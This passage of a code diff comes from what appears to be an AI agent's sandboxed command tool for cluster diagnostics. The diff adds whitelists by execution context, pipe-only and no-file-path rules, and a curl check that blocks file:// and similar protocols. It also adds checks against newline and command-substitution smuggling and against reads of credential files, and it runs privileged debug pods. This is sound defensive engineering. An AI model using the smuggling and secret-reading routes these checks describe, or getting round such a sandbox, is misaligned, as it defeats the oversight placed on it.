+        "-N", "--no-doc", "-j", "--tojson", "-p", "--input-format",
+        "--xml-attribute-prefix", "--xml-content-name",
+        "-s", "--split-exp", "--unwrapScalar", "--nul-output", "--header-preprocess",
+      ],
+    },
+    { command: "yq", contexts: ["local"], pipeOnly: true, noFilePaths: true },
+  ],
 
   ethtool: {
     command: "ethtool", category: "network",
@@ -369,10 +402,10 @@ export const COMMAND_RULES: Record<string, CommandRule> = {
     positionals: 1,
   },
 
-  uniq: {
-    command: "uniq", category: "text",
-    positionals: 1,
-  },
+  uniq: [
+    { command: "uniq", category: "text", positionals: 1 },
+    { command: "uniq", contexts: ["local"], pipeOnly: true, noFilePaths: true },
+  ],
 
   // ── Subcommand whitelist (position: 0) ──
 
@@ -473,8 +506,19 @@ for (const bin of [
 
 // ── Generic rule engine ──────────────────────────────────────────
 
-function validateByRule(args: string[], rule: CommandRule): string | null {
+function validateByRule(
+  args: string[],
+  rule: CommandRule,
+  options?: { piped?: boolean },
+): string | null {
   const cmd = rule.command;
+
+  // 0. pipeOnly: must appear after a pipe |
+  if (rule.pipeOnly && options?.piped !== undefined && !options.piped) {
+    return JSON.stringify({
+      error: `"${cmd}" can only be used after a pipe (|). Direct file reading is not allowed — use the dedicated file tools instead.`,
+    }, null, 2);
+  }
 
   // 1. requiredFlags: at least one must be present
   if (rule.requiredFlags?.length) {
@@ -523,10 +567,43 @@ function validateByRule(args: string[], rule: CommandRule): string | null {
           error: `${cmd} does not allow more than ${positionalPolicy} positional argument(s).`,
         }, null, 2);
       }
+      // noFilePaths: block positional args that look like file/directory paths
+      if (rule.noFilePaths && arg !== "") {
+        if (
+          arg.startsWith("/") ||
+          arg.startsWith("./") ||
+          arg.startsWith("../") ||
+          arg.startsWith("~")
+        ) {
+          return JSON.stringify({
+            error: `${cmd} cannot take file path arguments — it should only process piped input. Use the dedicated file tools instead.`,
+          }, null, 2);
+        }
+      }
       continue;
     }
 
-    // flag check — skip if no allowedFlags defined
+    // blockedFlags: explicitly forbidden flags (checked before allowedFlags)
+    if (rule.blockedFlags) {
+      if (arg.startsWith("--")) {
+        if (rule.blockedFlags.includes(extractFlag(arg))) {
+          return JSON.stringify({
+            error: `${cmd} "${extractFlag(arg)}" is not allowed.`,
+          }, null, 2);
+        }
+      } else if (arg.length > 1) {
+        // Combined short flags: -rl → check each char against blocked list
+        for (const ch of arg.slice(1)) {
+          if (rule.blockedFlags.includes(`-${ch}`)) {
+            return JSON.stringify({
+              error: `${cmd} "-${ch}" is not allowed.`,
+            }, null, 2);
+          }
+        }
+      }
+    }
+
+    // allowedFlags check — skip if no allowedFlags defined
     if (!rule.allowedFlags) continue;
 
     const flag = extractFlag(arg);
@@ -1019,20 +1096,39 @@ const CUSTOM_VALIDATORS: Record<string, (args: string[], baseName: string) => st
 /**
  * Apply extra security restrictions to whitelisted commands.
  * Takes a raw command string, parses it internally.
+ * Optionally accepts context (for context-specific rules) and piped
+ * (for pipe-only enforcement).
  * Returns an error message string if blocked, or null if allowed.
  */
-export function validateCommandRestrictions(cmd: string): string | null {
+export function validateCommandRestrictions(
+  cmd: string,
+  options?: { context?: string; piped?: boolean },
+): string | null {
   const args = parseArgs(cmd);
   if (args.length === 0) return null;
 
   const baseName = args[0].split("/").pop()?.toLowerCase() ?? "";
 
-  const rule = COMMAND_RULES[baseName];
-  if (!rule) return null;
+  const entry = COMMAND_RULES[baseName];
+  if (!entry) return null;
 
-  if (rule.customValidator) {
-    return CUSTOM_VALIDATORS[rule.customValidator]?.(args, baseName) ?? null;
+  const rules = Array.isArray(entry) ? entry : [entry];
+
+  for (const rule of rules) {
+    // Skip rules that don't apply to the current context
+    if (rule.contexts && (!options?.context || !rule.contexts.includes(options.context))) {
+      continue;
+    }
+
+    if (rule.customValidator) {
+      const err = CUSTOM_VALIDATORS[rule.customValidator]?.(args, baseName) ?? null;
+      if (err) return err;
+      continue;
+    }
+
+    const err = validateByRule(args, rule, { piped: options?.piped });
+    if (err) return err;
   }
 
-  return validateByRule(args, rule);
+  return null;
 }

--- a/src/tools/command-sets.ts
+++ b/src/tools/command-sets.ts
@@ -745,7 +745,17 @@ function checkCurlDataValue(flag: string, value: string | undefined): string | n
 function validateCurl(args: string[]): string | null {
   for (let i = 1; i < args.length; i++) {
     const arg = args[i];
-    if (!arg.startsWith("-")) continue;
+    if (!arg.startsWith("-")) {
+      // Positional argument — must be a URL. Only allow http(s)://.
+      // Block file://, ftp://, dict://, gopher://, etc.
+      const lower = arg.toLowerCase();
+      if (lower.includes("://") && !lower.startsWith("http://") && !lower.startsWith("https://")) {
+        return JSON.stringify({
+          error: `curl "${arg}" uses a blocked protocol. Only http:// and https:// URLs are allowed.`,
+        }, null, 2);
+      }
+      continue;
+    }
 
     // ── Long flags (--xxx) ──────────────────────────────────
     if (arg.startsWith("--")) {

--- a/src/tools/command-sets.ts
+++ b/src/tools/command-sets.ts
@@ -140,6 +140,99 @@ export const ALLOWED_COMMANDS = new Set([
   "expr", "seq",
 ]);
 
+// ── Command categories and context-based whitelists ──────────────
+
+/** Map each command to its functional category. */
+export const COMMAND_CATEGORIES: Record<string, string> = {
+  // text processing
+  grep: "text", egrep: "text", fgrep: "text",
+  sort: "text", uniq: "text", wc: "text", head: "text", tail: "text",
+  cut: "text", tr: "text", jq: "text", yq: "text", column: "text",
+  // network
+  ip: "network", ifconfig: "network", ping: "network", traceroute: "network",
+  tracepath: "network", ss: "network", netstat: "network", route: "network",
+  arp: "network", ethtool: "network", mtr: "network", nslookup: "network",
+  dig: "network", host: "network", bridge: "network", tc: "network",
+  conntrack: "network", curl: "network",
+  // RDMA
+  ibstat: "rdma", ibstatus: "rdma", ibv_devinfo: "rdma", ibv_devices: "rdma",
+  rdma: "rdma", ibaddr: "rdma", iblinkinfo: "rdma", ibportstate: "rdma",
+  ibswitches: "rdma", ibroute: "rdma", show_gids: "rdma", ibdev2netdev: "rdma",
+  // perftest
+  ib_write_bw: "perftest", ib_write_lat: "perftest",
+  ib_read_bw: "perftest", ib_read_lat: "perftest",
+  ib_send_bw: "perftest", ib_send_lat: "perftest",
+  ib_atomic_bw: "perftest", ib_atomic_lat: "perftest",
+  raw_ethernet_bw: "perftest", raw_ethernet_lat: "perftest",
+  raw_ethernet_burst_lat: "perftest",
+  // GPU
+  "nvidia-smi": "gpu", gpustat: "gpu", nvtopo: "gpu",
+  // hardware
+  lspci: "hardware", lsusb: "hardware", lsblk: "hardware",
+  lscpu: "hardware", lsmem: "hardware", lshw: "hardware", dmidecode: "hardware",
+  // kernel
+  uname: "kernel", hostname: "kernel", uptime: "kernel",
+  dmesg: "kernel", sysctl: "kernel", lsmod: "kernel", modinfo: "kernel",
+  // process / resource
+  ps: "process", pgrep: "process", top: "process", free: "process",
+  vmstat: "process", iostat: "process", mpstat: "process",
+  df: "process", du: "process", mount: "process", findmnt: "process", nproc: "process",
+  // file (read-only) — blocked in local context
+  cat: "file", ls: "file", pwd: "file", stat: "file", file: "file",
+  find: "file", readlink: "file", realpath: "file", basename: "file", dirname: "file",
+  diff: "file", md5sum: "file", sha256sum: "file",
+  // diagnostic
+  sichek: "diagnostic",
+  // services
+  journalctl: "services", systemctl: "services",
+  timedatectl: "services", hostnamectl: "services",
+  // container
+  crictl: "container", ctr: "container",
+  // firewall
+  iptables: "firewall", ip6tables: "firewall",
+  // inspection — blocked in local context
+  lsof: "inspection", lsns: "inspection", strings: "inspection",
+  // compressed — blocked in local context
+  zcat: "compressed", zgrep: "compressed", bzcat: "compressed", xzcat: "compressed",
+  // activity
+  sar: "activity", blkid: "activity",
+  // stream
+  tee: "stream",
+  // general (env/printenv separated — blocked in local context)
+  date: "general", whoami: "general", id: "general", which: "general",
+  env: "general-env", printenv: "general-env",
+  // flow control
+  echo: "flow", printf: "flow", true: "flow", false: "flow",
+  sleep: "flow", wait: "flow", test: "flow", expr: "flow", seq: "flow",
+};
+
+/**
+ * Categories allowed per execution context.
+ * local:   agentbox / TUI process (no file/env access — use Read/Grep/Glob tools)
+ * node:    remote node via debug pod
+ * pod:     remote pod via kubectl exec
+ * nsenter: remote pod netns via debug pod
+ * ssh:     remote host via SSH (future)
+ */
+const ALL_REMOTE_CATEGORIES = [
+  "text", "network", "rdma", "perftest", "gpu", "hardware", "kernel",
+  "process", "file", "diagnostic", "services", "container", "firewall",
+  "inspection", "compressed", "activity", "stream", "general", "general-env",
+  "flow",
+] as const;
+
+export const CONTEXT_CATEGORIES: Record<string, readonly string[]> = {
+  local: [
+    "text", "network", "rdma", "perftest", "gpu", "hardware", "kernel",
+    "process", "diagnostic", "services", "container", "firewall",
+    "activity", "stream", "general", "flow",
+  ],
+  node: [...ALL_REMOTE_CATEGORIES],
+  pod: [...ALL_REMOTE_CATEGORIES],
+  nsenter: [...ALL_REMOTE_CATEGORIES],
+  ssh: [...ALL_REMOTE_CATEGORIES],
+};
+
 // ── Declarative Command Rule Engine ──────────────────────────────
 
 /**

--- a/src/tools/command-validator.ts
+++ b/src/tools/command-validator.ts
@@ -1,0 +1,313 @@
+/**
+ * Unified command validation: shell parsing, context-based whitelist, and restrictions.
+ *
+ * Centralises logic previously duplicated across restricted-bash.ts and node-exec.ts.
+ */
+import {
+  ALLOWED_COMMANDS,
+  COMMAND_CATEGORIES,
+  CONTEXT_CATEGORIES,
+  getCommandBinary,
+  validateCommandRestrictions,
+} from "./command-sets.js";
+
+// ── Types ────────────────────────────────────────────────────────────
+
+export type ExecContext = "local" | "node" | "pod" | "nsenter" | "ssh";
+
+export interface ValidateCommandOptions {
+  /** Determines the base whitelist. Default: "node". */
+  context?: ExecContext;
+  /** Extra binaries allowed beyond the context whitelist (e.g. "kubectl"). */
+  extraAllowed?: Set<string>;
+  /** Custom predicate for commands not in any whitelist (e.g. skill scripts). */
+  isAllowed?: (cmd: string) => boolean;
+  /** Validators run against the full pipeline (e.g. kubectl subcommand check). */
+  pipelineValidators?: Array<(cmds: string[]) => string | null>;
+  /** Patterns that block commands touching sensitive paths. */
+  sensitivePathPatterns?: RegExp[];
+}
+
+// ── extractCommands (moved from restricted-bash.ts) ──────────────────
+
+/**
+ * Extract individual commands from a shell pipeline.
+ * Splits on |, &&, ;, || while respecting quotes and subshells.
+ */
+export function extractCommands(input: string): string[] {
+  const commands: string[] = [];
+  let current = "";
+  let inQuote: string | null = null;
+  let parenDepth = 0;
+
+  for (let i = 0; i < input.length; i++) {
+    const ch = input[i];
+
+    if (inQuote) {
+      current += ch;
+      if (ch === inQuote && input[i - 1] !== "\\") {
+        inQuote = null;
+      }
+      continue;
+    }
+
+    if (ch === '"' || ch === "'" || ch === "`") {
+      inQuote = ch;
+      current += ch;
+      continue;
+    }
+
+    if (ch === "(") {
+      parenDepth++;
+      current += ch;
+      continue;
+    }
+    if (ch === ")") {
+      parenDepth--;
+      current += ch;
+      continue;
+    }
+
+    // Only split at top-level (not inside subshells)
+    if (parenDepth === 0) {
+      // Check for ||, &&
+      if (
+        (ch === "&" && input[i + 1] === "&") ||
+        (ch === "|" && input[i + 1] === "|")
+      ) {
+        if (current.trim()) commands.push(current.trim());
+        current = "";
+        i++; // skip next char
+        continue;
+      }
+      // Check for single & (background), | and ;
+      // But skip & when preceded by > (fd redirection like >&2, 2>&1)
+      if (ch === "&" && current.length > 0 && current[current.length - 1] === ">") {
+        current += ch;
+        continue;
+      }
+      if (ch === "&" || ch === "|" || ch === ";") {
+        if (current.trim()) commands.push(current.trim());
+        current = "";
+        continue;
+      }
+    }
+
+    current += ch;
+  }
+
+  if (current.trim()) commands.push(current.trim());
+  return commands;
+}
+
+// ── validateShellOperators (moved from restricted-bash.ts) ───────────
+
+/**
+ * Validate that a command does not use dangerous shell operators.
+ * Scans character-by-character respecting quotes.
+ * Blocks: > >> (output redirection, except >&N fd duplication and >/dev/null),
+ *         $() and backticks (command substitution), <() >() (process substitution).
+ * Returns an error message if blocked, or null if safe.
+ */
+export function validateShellOperators(command: string): string | null {
+  let inQuote: string | null = null;
+
+  for (let i = 0; i < command.length; i++) {
+    const ch = command[i];
+
+    // Block newline/carriage-return characters — bash interprets them as command
+    // separators, but extractCommands() does not split on them, so they can be
+    // used to smuggle commands past whitelist validation.
+    if (ch === "\n" || ch === "\r") {
+      return JSON.stringify({
+        error: "Newline characters are not allowed in commands.",
+      }, null, 2);
+    }
+
+    // Block backtick command substitution everywhere (including inside quotes)
+    if (ch === "`") {
+      return JSON.stringify({
+        error: "Backtick command substitution is not allowed.",
+      }, null, 2);
+    }
+
+    // Block $() command substitution everywhere (including inside quotes)
+    if (ch === "$" && command[i + 1] === "(") {
+      return JSON.stringify({
+        error: "$() command substitution is not allowed.",
+      }, null, 2);
+    }
+
+    // Track quote state for redirection checks only
+    if (inQuote) {
+      if (ch === inQuote && command[i - 1] !== "\\") {
+        inQuote = null;
+      }
+      continue;
+    }
+
+    if (ch === "'" || ch === '"') {
+      inQuote = ch;
+      continue;
+    }
+
+    // Block <() process substitution
+    if (ch === "<" && command[i + 1] === "(") {
+      return JSON.stringify({
+        error: "<() process substitution is not allowed.",
+      }, null, 2);
+    }
+
+    // Block bare < input redirection (but not <( which is already handled above)
+    if (ch === "<" && command[i + 1] !== "(") {
+      return JSON.stringify({
+        error: "Input redirection (<) is not allowed.",
+      }, null, 2);
+    }
+
+    // Check output redirection: > and >>
+    if (ch === ">") {
+      // Allow >() process substitution — already blocked above when preceded by nothing,
+      // but >( after a word is process substitution too
+      if (command[i + 1] === "(") {
+        return JSON.stringify({
+          error: ">() process substitution is not allowed.",
+        }, null, 2);
+      }
+
+      // Allow fd duplication: >&N (e.g. 2>&1, >&2)
+      if (command[i + 1] === "&") continue;
+
+      // Determine the redirect target (skip optional second > for >>)
+      let j = i + 1;
+      if (command[j] === ">") j++; // >>
+      // Skip whitespace
+      while (j < command.length && command[j] === " ") j++;
+
+      // Allow redirect to /dev/null
+      const target = command.substring(j);
+      if (/^\/dev\/null\b/.test(target)) continue;
+
+      return JSON.stringify({
+        error: "Output redirection (> or >>) to files is not allowed.",
+      }, null, 2);
+    }
+  }
+
+  return null;
+}
+
+// ── Context-based command whitelist ──────────────────────────────────
+
+const contextCommandsCache = new Map<string, ReadonlySet<string>>();
+
+/**
+ * Get the set of commands allowed for a given execution context.
+ * Results are cached for performance.
+ */
+export function getContextCommands(context: ExecContext): ReadonlySet<string> {
+  const cached = contextCommandsCache.get(context);
+  if (cached) return cached;
+
+  const categories = CONTEXT_CATEGORIES[context];
+  if (!categories) return ALLOWED_COMMANDS; // fallback
+
+  const categorySet = new Set(categories);
+  const cmds = new Set<string>();
+  for (const [cmd, cat] of Object.entries(COMMAND_CATEGORIES)) {
+    if (categorySet.has(cat)) cmds.add(cmd);
+  }
+
+  contextCommandsCache.set(context, cmds);
+  return cmds;
+}
+
+// ── Unified validation entry point ──────────────────────────────────
+
+const FILE_READING_CMDS = new Set(["cat", "head", "tail", "less", "more", "grep", "awk", "gawk"]);
+
+/**
+ * Validate a command string against context-based whitelist and restrictions.
+ * Pipeline:
+ *   1. validateShellOperators()
+ *   2. extractCommands()
+ *   3. Per-command: context whitelist + extraAllowed + isAllowed
+ *   4. pipelineValidators (e.g. validateKubectlInPipeline)
+ *   5. validateCommandRestrictions()
+ *   6. sensitivePathPatterns check
+ *
+ * Returns an error message string if blocked, or null if allowed.
+ */
+export function validateCommand(command: string, options?: ValidateCommandOptions): string | null {
+  if (!command || !command.trim()) {
+    return "Command must not be empty.";
+  }
+
+  // 1. Shell operator validation
+  const shellOpErr = validateShellOperators(command);
+  if (shellOpErr) return shellOpErr;
+
+  // 2. Split pipeline
+  const commands = extractCommands(command);
+  if (commands.length === 0) {
+    return "Command must not be empty.";
+  }
+
+  // 3. Per-command whitelist check
+  const context = options?.context ?? "node";
+  const contextCmds = getContextCommands(context);
+  const violations: string[] = [];
+
+  for (const cmd of commands) {
+    const binary = getCommandBinary(cmd);
+    if (!binary) continue;
+
+    // Check extraAllowed first (e.g., kubectl for local)
+    if (options?.extraAllowed?.has(binary)) continue;
+
+    // Check context whitelist
+    if (contextCmds.has(binary)) continue;
+
+    // Check custom isAllowed (e.g., skill scripts)
+    if (options?.isAllowed?.(cmd)) continue;
+
+    violations.push(binary);
+  }
+
+  if (violations.length > 0) {
+    return JSON.stringify({
+      error: `Blocked: disallowed command(s) — "${[...new Set(violations)].join(", ")}" is not in the allowed command list`,
+      allowed: [...contextCmds, ...(options?.extraAllowed ?? [])].sort(),
+    }, null, 2);
+  }
+
+  // 4. Pipeline validators (e.g., kubectl subcommand checks)
+  if (options?.pipelineValidators) {
+    for (const validator of options.pipelineValidators) {
+      const err = validator(commands);
+      if (err) return err;
+    }
+  }
+
+  // 5. Per-command restrictions (find -exec, sysctl -w, curl -o, etc.)
+  for (const cmd of commands) {
+    const err = validateCommandRestrictions(cmd);
+    if (err) return err;
+  }
+
+  // 6. Sensitive path patterns
+  if (options?.sensitivePathPatterns) {
+    for (const cmd of commands) {
+      const binary = getCommandBinary(cmd);
+      if (binary && FILE_READING_CMDS.has(binary)) {
+        if (options.sensitivePathPatterns.some((re) => re.test(cmd))) {
+          return JSON.stringify({
+            error: "Reading credential or config files is not allowed.",
+          }, null, 2);
+        }
+      }
+    }
+  }
+
+  return null;
+}

--- a/src/tools/command-validator.ts
+++ b/src/tools/command-validator.ts
@@ -100,6 +100,86 @@ export function extractCommands(input: string): string[] {
   return commands;
 }
 
+// ── extractPipeline (pipe-position-aware command extraction) ──────────
+
+export interface PipelineSegment {
+  command: string;
+  /** true if this command was preceded by a pipe operator | (not ||) */
+  piped: boolean;
+}
+
+/**
+ * Extract individual commands from a shell pipeline, tracking whether each
+ * command follows a pipe (|) operator vs other separators (&&, ||, ;, &).
+ * Used by validateCommand to pass pipe position to COMMAND_RULES (pipeOnly).
+ */
+export function extractPipeline(input: string): PipelineSegment[] {
+  const segments: PipelineSegment[] = [];
+  let current = "";
+  let inQuote: string | null = null;
+  let parenDepth = 0;
+  let nextIsPiped = false;
+
+  for (let i = 0; i < input.length; i++) {
+    const ch = input[i];
+
+    if (inQuote) {
+      current += ch;
+      if (ch === inQuote && input[i - 1] !== "\\") {
+        inQuote = null;
+      }
+      continue;
+    }
+
+    if (ch === '"' || ch === "'" || ch === "`") {
+      inQuote = ch;
+      current += ch;
+      continue;
+    }
+
+    if (ch === "(") { parenDepth++; current += ch; continue; }
+    if (ch === ")") { parenDepth--; current += ch; continue; }
+
+    if (parenDepth === 0) {
+      // Check for || and &&
+      if (
+        (ch === "&" && input[i + 1] === "&") ||
+        (ch === "|" && input[i + 1] === "|")
+      ) {
+        if (current.trim()) segments.push({ command: current.trim(), piped: nextIsPiped });
+        current = "";
+        nextIsPiped = false; // || and && are not pipes
+        i++; // skip next char
+        continue;
+      }
+      // Skip & when preceded by > (fd redirection like >&2, 2>&1)
+      if (ch === "&" && current.length > 0 && current[current.length - 1] === ">") {
+        current += ch;
+        continue;
+      }
+      // Single | — next command receives piped input
+      if (ch === "|") {
+        if (current.trim()) segments.push({ command: current.trim(), piped: nextIsPiped });
+        current = "";
+        nextIsPiped = true;
+        continue;
+      }
+      // & or ; — not pipes
+      if (ch === "&" || ch === ";") {
+        if (current.trim()) segments.push({ command: current.trim(), piped: nextIsPiped });
+        current = "";
+        nextIsPiped = false;
+        continue;
+      }
+    }
+
+    current += ch;
+  }
+
+  if (current.trim()) segments.push({ command: current.trim(), piped: nextIsPiped });
+  return segments;
+}
+
 // ── validateShellOperators (moved from restricted-bash.ts) ───────────
 
 /**
@@ -222,18 +302,26 @@ export function getContextCommands(context: ExecContext): ReadonlySet<string> {
   return cmds;
 }
 
-// ── Unified validation entry point ──────────────────────────────────
+// ── Sensitive path patterns (secondary defense) ──────────────────────
 
-const FILE_READING_CMDS = new Set(["cat", "head", "tail", "less", "more", "grep", "awk", "gawk"]);
+const FILE_READING_CMDS = new Set([
+  "cat", "head", "tail", "less", "more",
+  "grep", "egrep", "fgrep", "awk", "gawk",
+  "cut", "sort", "wc", "uniq", "column",
+  "jq", "yq", "strings", "diff",
+]);
+
+// ── Unified validation entry point ──────────────────────────────────
 
 /**
  * Validate a command string against context-based whitelist and restrictions.
  * Pipeline:
  *   1. validateShellOperators()
- *   2. extractCommands()
+ *   2. extractPipeline() (with pipe position tracking)
  *   3. Per-command: context whitelist + extraAllowed + isAllowed
  *   4. pipelineValidators (e.g. validateKubectlInPipeline)
- *   5. validateCommandRestrictions()
+ *   5. validateCommandRestrictions() — includes pipeOnly, noFilePaths,
+ *      blockedFlags via COMMAND_RULES (context + pipe-position-aware)
  *   6. sensitivePathPatterns check
  *
  * Returns an error message string if blocked, or null if allowed.
@@ -247,8 +335,9 @@ export function validateCommand(command: string, options?: ValidateCommandOption
   const shellOpErr = validateShellOperators(command);
   if (shellOpErr) return shellOpErr;
 
-  // 2. Split pipeline
-  const commands = extractCommands(command);
+  // 2. Split pipeline (with pipe position tracking)
+  const pipeline = extractPipeline(command);
+  const commands = pipeline.map(s => s.command);
   if (commands.length === 0) {
     return "Command must not be empty.";
   }
@@ -289,13 +378,17 @@ export function validateCommand(command: string, options?: ValidateCommandOption
     }
   }
 
-  // 5. Per-command restrictions (find -exec, sysctl -w, curl -o, etc.)
-  for (const cmd of commands) {
-    const err = validateCommandRestrictions(cmd);
+  // 5. Per-command restrictions (pipeOnly, noFilePaths, blockedFlags,
+  //    allowedFlags, positionals, etc. — all via COMMAND_RULES)
+  for (const seg of pipeline) {
+    const err = validateCommandRestrictions(seg.command, {
+      context,
+      piped: seg.piped,
+    });
     if (err) return err;
   }
 
-  // 6. Sensitive path patterns
+  // 6. Sensitive path patterns (secondary defense layer)
   if (options?.sensitivePathPatterns) {
     for (const cmd of commands) {
       const binary = getCommandBinary(cmd);

--- a/src/tools/exec-utils.ts
+++ b/src/tools/exec-utils.ts
@@ -1,0 +1,392 @@
+/**
+ * Execution infrastructure shared by all remote execution tools.
+ *
+ * Consolidates: process spawning, environment setup, name validation,
+ * debug pod lifecycle, container netns resolution, and output formatting.
+ */
+import { spawn } from "node:child_process";
+import { randomBytes } from "node:crypto";
+import type { KubeconfigRef } from "../core/agent-factory.js";
+import { resolveKubeconfigPath } from "./kubeconfig-resolver.js";
+import { sanitizeEnv } from "./sanitize-env.js";
+import { processToolOutput } from "./tool-render.js";
+import { checkNodeReady, waitForPodDone } from "./k8s-checks.js";
+import { loadConfig } from "../core/config.js";
+
+// ── Name validators ──────────────────────────────────────────────────
+
+/** Valid node name: RFC 1123 — alphanumeric, hyphens, dots. */
+export const NODE_NAME_RE = /^[a-zA-Z0-9][a-zA-Z0-9.\-]*$/;
+
+/** Valid pod name: RFC 1123 subdomain — lowercase alphanumeric, hyphens, dots. */
+export const POD_NAME_RE = /^[a-z0-9][a-z0-9.\-]*$/;
+
+export function validateNodeName(node: string): string | null {
+  if (!node || !node.trim()) {
+    return "Node name must not be empty.";
+  }
+  if (!NODE_NAME_RE.test(node)) {
+    return `Invalid node name "${node}". Node names may only contain letters, digits, hyphens, and dots.`;
+  }
+  return null;
+}
+
+export function validatePodName(pod: string): string | null {
+  if (!pod || !pod.trim()) {
+    return "Pod name must not be empty.";
+  }
+  if (!POD_NAME_RE.test(pod)) {
+    return `Invalid pod name "${pod}". Pod names may only contain lowercase letters, digits, hyphens, and dots.`;
+  }
+  return null;
+}
+
+// ── Environment preparation ──────────────────────────────────────────
+
+export interface ExecEnv {
+  childEnv: NodeJS.ProcessEnv;
+  kubeconfigPath: string | null;
+  kubeconfigArgs: string[];
+}
+
+/**
+ * Build a sanitised child-process environment with kubeconfig resolution.
+ * Sets KUBECONFIG=/dev/null to block default ~/.kube/config; passes
+ * explicit --kubeconfig= via kubeconfigArgs when credentials are available.
+ */
+export function prepareExecEnv(kubeconfigRef?: KubeconfigRef): ExecEnv {
+  const kubeconfigPath = resolveKubeconfigPath(kubeconfigRef?.credentialsDir);
+  return {
+    childEnv: {
+      ...sanitizeEnv(process.env as Record<string, string>),
+      ...(kubeconfigRef?.credentialsDir
+        ? { SICLAW_CREDENTIALS_DIR: kubeconfigRef.credentialsDir }
+        : {}),
+      KUBECONFIG: "/dev/null",
+    },
+    kubeconfigPath,
+    kubeconfigArgs: kubeconfigPath ? [`--kubeconfig=${kubeconfigPath}`] : [],
+  };
+}
+
+// ── Process utilities ────────────────────────────────────────────────
+
+/**
+ * Spawn a child process and collect stdout/stderr.
+ * Supports timeout and AbortSignal for cancellation.
+ */
+export function spawnAsync(
+  cmd: string,
+  args: string[],
+  timeout: number,
+  env?: NodeJS.ProcessEnv,
+  signal?: AbortSignal,
+): Promise<{ stdout: string; stderr: string }> {
+  return new Promise((resolve, reject) => {
+    let stdout = "";
+    let stderr = "";
+    const child = spawn(cmd, args, {
+      stdio: ["ignore", "pipe", "pipe"],
+      env,
+    });
+    const onAbort = () => child.kill("SIGKILL");
+    signal?.addEventListener("abort", onAbort, { once: true });
+    child.stdout.on("data", (chunk: Buffer) => {
+      stdout += chunk.toString();
+    });
+    child.stderr.on("data", (chunk: Buffer) => {
+      stderr += chunk.toString();
+    });
+    const timer = setTimeout(() => {
+      child.kill("SIGKILL");
+    }, timeout);
+    child.on("close", (code) => {
+      clearTimeout(timer);
+      signal?.removeEventListener("abort", onAbort);
+      if (code === 0) resolve({ stdout, stderr });
+      else
+        reject(
+          Object.assign(new Error(`exit ${code}`), { code, stdout, stderr }),
+        );
+    });
+    child.on("error", (err) => {
+      clearTimeout(timer);
+      signal?.removeEventListener("abort", onAbort);
+      reject(err);
+    });
+  });
+}
+
+/**
+ * Filter out kubectl run informational lines from stderr
+ * (e.g. 'pod "node-debug-xxx" deleted').
+ */
+export function filterPodNoise(stderr: string): string {
+  return stderr
+    .split("\n")
+    .filter((line) => !line.match(/^pod "node-debug-.*" deleted$/))
+    .join("\n")
+    .trim();
+}
+
+// ── Output formatting ────────────────────────────────────────────────
+
+export interface ExecResult {
+  stdout: string;
+  stderr: string;
+  exitCode: number | null;
+}
+
+/**
+ * Format an ExecResult into a standard tool result shape.
+ * Applies filterPodNoise and processToolOutput.
+ */
+export function formatExecOutput(result: ExecResult): {
+  content: Array<{ type: "text"; text: string }>;
+  details: { exitCode: number | null; error?: boolean };
+} {
+  const filteredStderr = filterPodNoise(result.stderr);
+  const output =
+    result.stdout.trim() +
+    (filteredStderr ? `\n\nSTDERR:\n${filteredStderr}` : "");
+
+  if (result.exitCode === 0 || (result.exitCode === null && result.stdout.trim())) {
+    return {
+      content: [{ type: "text", text: processToolOutput(output) }],
+      details: { exitCode: result.exitCode ?? 0 },
+    };
+  } else {
+    const errOutput = `Exit code: ${result.exitCode ?? "unknown"}\n${output}`;
+    return {
+      content: [{ type: "text", text: processToolOutput(errOutput) }],
+      details: { exitCode: result.exitCode, error: true },
+    };
+  }
+}
+
+// ── Debug Pod lifecycle ──────────────────────────────────────────────
+
+export interface DebugPodSpec {
+  nodeName: string;
+  /** Full command array for the container (including nsenter if needed). */
+  command: string[];
+  image?: string;
+}
+
+/**
+ * Run a command inside a privileged debug pod on a specific node.
+ *
+ * Manages the full 5-phase lifecycle:
+ *   1. Create pod (kubectl run)
+ *   2. Wait for terminal phase (Succeeded / Failed)
+ *   3. Fetch logs
+ *   4. Get exit code
+ *   5. Cleanup (delete pod)
+ */
+export async function runInDebugPod(
+  spec: DebugPodSpec,
+  env: ExecEnv,
+  opts: { timeoutMs: number; signal?: AbortSignal },
+): Promise<ExecResult> {
+  const image = spec.image || loadConfig().debugImage;
+  const podId = randomBytes(4).toString("hex");
+  const podName = `node-debug-${podId}`;
+
+  const cleanup = () => {
+    spawnAsync(
+      "kubectl",
+      [...env.kubeconfigArgs, "delete", "pod", podName, "--force", "--grace-period=0"],
+      10_000,
+      env.childEnv,
+    ).catch(() => {});
+  };
+
+  const overrides = JSON.stringify({
+    spec: {
+      nodeName: spec.nodeName,
+      hostPID: true,
+      hostNetwork: true,
+      containers: [{
+        name: podName,
+        image,
+        securityContext: { privileged: true },
+        command: spec.command,
+      }],
+      restartPolicy: "Never",
+    },
+  });
+
+  try {
+    // Phase 1: Create pod
+    await spawnAsync(
+      "kubectl",
+      [
+        ...env.kubeconfigArgs,
+        "run", podName,
+        "--restart=Never",
+        `--image=${image}`,
+        `--overrides=${overrides}`,
+      ],
+      30_000,
+      env.childEnv,
+      opts.signal,
+    );
+
+    // Phase 2: Wait for pod to reach terminal phase (Succeeded or Failed)
+    try {
+      await waitForPodDone(
+        podName, opts.timeoutMs, env.childEnv, opts.signal,
+        env.kubeconfigPath ?? undefined,
+      );
+    } catch {
+      // Timed out — still fetch logs before cleanup
+    }
+
+    if (opts.signal?.aborted) {
+      cleanup();
+      return { stdout: "", stderr: "Aborted.", exitCode: null };
+    }
+
+    // Phase 3: Fetch logs
+    let stdout = "";
+    let stderr = "";
+    try {
+      const logsResult = await spawnAsync(
+        "kubectl",
+        [...env.kubeconfigArgs, "logs", podName],
+        10_000,
+        env.childEnv,
+      );
+      stdout = logsResult.stdout;
+      stderr = logsResult.stderr;
+    } catch (logErr: any) {
+      stdout = logErr.stdout ?? "";
+      stderr = logErr.stderr ?? "";
+    }
+
+    // Phase 4: Get exit code from pod status
+    let exitCode: number | null = null;
+    try {
+      const statusResult = await spawnAsync(
+        "kubectl",
+        [
+          ...env.kubeconfigArgs, "get", "pod", podName,
+          "-o", "jsonpath={.status.containerStatuses[0].state.terminated.exitCode}",
+        ],
+        5_000,
+        env.childEnv,
+      );
+      const code = parseInt(statusResult.stdout.trim(), 10);
+      if (!isNaN(code)) exitCode = code;
+    } catch {
+      // ignore — exitCode stays null
+    }
+
+    // Phase 5: Cleanup
+    cleanup();
+
+    return { stdout, stderr, exitCode };
+  } catch (err: any) {
+    cleanup();
+    return {
+      stdout: err.stdout?.trim() ?? "",
